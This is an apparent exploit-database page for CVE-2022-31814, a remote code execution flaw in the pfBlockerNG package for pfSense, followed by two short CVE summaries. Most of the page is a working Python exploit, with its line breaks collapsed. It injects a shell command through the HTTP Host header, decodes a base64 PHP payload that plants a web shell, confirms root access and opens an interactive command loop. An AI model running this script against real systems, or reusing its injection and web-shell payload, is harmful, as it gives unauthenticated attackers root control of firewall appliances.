

pfBlockerNG 2.1.4_26 Remote Code Execution

pfBlockerNG version 2.1.4_26 remote code execution exploit.

# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)# Shodan Results: Date: 5th of September 2022# Exploit Author: IHTeam# Vendor Homepage: Software Link: Version: 2.1.4_26# Tested on: pfSense 2.6.0# CVE : CVE-2022-31814# Original Advisory: #!/usr/bin/env python3import argparseimport requestsimport timeimport sysimport urllib.parsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.:")args = parser.parse_args() url = args.urlshell_filename = "system_advanced_control.php" def check_endpoint(url):  response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)  if response.status_code == 200:    print("[+] pfBlockerNG is installed")  else:    print("\n[-] pfBlockerNG not installed")    sys.exit() def upload_shell(url, shell_filename):  payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}  print("[/] Uploading shell...")  response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)  time.sleep(2)  response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)  if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):    print("[+] Upload succeeded")  else:    print("\n[-] Error uploading shell. Probably patched ", response.content)    sys.exit() def interactive_shell(url, shell_filename, cmd):  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)  print(str(response.text)+"\n")  def delete_shell(url, shell_filename):  delcmd = "rm /usr/local/www/system_advanced_control.php"  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)  print("\n[+] Shell deleted") check_endpoint(url)upload_shell(url, shell_filename)try:  while True:    cmd = input("# ")    interactive_shell(url, shell_filename, cmd)except:  delete_shell(url, shell_filename)

CVE-2022-40624: GitHub - dhammon/pfBlockerNg-CVE-2022-40624

pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814.

CVE-2022-31814: pfBlockerNG Unauth RCE Vulnerability - IHTeam Security Blog

pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.

